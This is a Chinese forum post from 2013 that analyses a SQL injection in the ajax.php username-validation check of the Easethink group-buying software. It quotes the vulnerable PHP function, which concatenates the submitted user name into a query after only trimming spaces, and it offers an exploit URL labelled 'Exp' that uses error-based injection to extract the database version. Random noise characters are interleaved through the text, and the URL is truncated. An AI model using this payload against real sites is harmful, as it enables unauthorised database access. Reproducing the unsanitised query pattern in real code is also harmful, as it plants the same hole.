找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2183|回复: 0
打印 上一主题 下一主题

易想团购ajax.php SQL注入分析和Exp

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:48:23 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php。很多程序多会忽略这个导致存在SQL注入。3 w$ D6 M( r- m* H, z* Y& y
/ M) o! O, c3 T0 h; d, o! {" ?
+ i0 @& v1 Z- A; X8 I# r
- S3 z2 S" M( I; D
* 验证会员数据          */         function check_user($field_name,$field_data)         {                 //开始数据验证                 $user_data[$field_name] = $field_data;                 $res = array('status'=>1,'info'=>'','data'=>''); //用于返回的数据                 if(trim($user_data['user_name'])==''&&$field_name=='user_name')                 {                         $field_item['field_name'] = 'user_name';                         $field_item['error']        =        EMPTY_ERROR;                         $res['status'] = 0;                         $res['data'] = $field_item;                         return $res;                 }                 if($field_name=='user_name'&&$GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."user where user_name = '".trim($user_data['user_name'])."' and id <> ".intval($user_data['id']))>0)//这里的$user_data['user_name']的值就是用户名提交过来的值,这里只是过滤了空格。所有存在SQL注入漏洞。                 {                         $field_item['field_name'] = 'user_name';                         $field_item['error']        =        EXIST_ERROR;                         $res['status'] = 0;                         $res['data'] = $field_item;                         return $res;                 } % w) t: D& r) I/ D! l7 H- k9 m- P

% ]2 \8 ?" b8 c; y! z1 X+ x" ~" Z
! w8 R0 ?$ f7 Z6 m+ A+ C+ {" ^5 @+ o3 h
Exp:
. T, C4 s+ y; K
# v  b9 k+ K* P  d) a
% M. N" T+ w) W; w' |  b* J
2 w' K  }* A6 L/ Z0 H. L" M+ Jhttp://192.168.9.109/easethink_f ... ame&field_data=**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
6 Y5 {& K, K- N# H4 C4 I2 D9 g$ o* F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表